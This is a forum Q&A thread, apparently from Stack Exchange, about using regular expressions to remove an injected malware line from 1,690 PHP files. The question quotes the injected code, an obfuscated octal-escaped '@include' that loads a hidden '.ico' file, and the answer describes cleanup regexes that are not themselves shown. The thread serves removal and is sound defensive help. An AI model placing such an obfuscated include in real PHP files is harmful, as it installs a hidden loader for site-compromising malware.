I try to find a way to find and replace using EMEditor and a Regular Expression. I try to applu this for the item below:
<?php /*f04b8*/ @include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o"; /*f04b8*/ // ini_set(?display_errors?, 1);
I try to replace / erase the code between
// ini_set(?display_errors?, 1);
everything in between is this maleware scipt that I try to get out from many files.
I look for a easy way to delete this in 1690 files.
Any idea would be very helpfull.
The PHP RegExpression for any similar strings would be…
This can be further simplified but works as is
**Note this will find all occurrences of the offending strings starting with a comment block containing 5 random characters that are not newlines, followed by two new lines, the @include line, 2 more new lines, and the matching block comment closure – regardless of if the document was saved on windows, mac, or linux machines – note \r\n (windows machines) and \n\n (linux & mac machines)
I’ve verified your string matches at the regex at:
Quick Heads-up, to find the malware files containing random string names that contain the obfuscated functions… use the following regex…
This should track down the altered files and find any additional malware files of the same for the malware you’re being affected by..
Have a great day! Hopefully this is still useful to someone.
Source : Link , Question Author : Thom , Answer Author : Davidw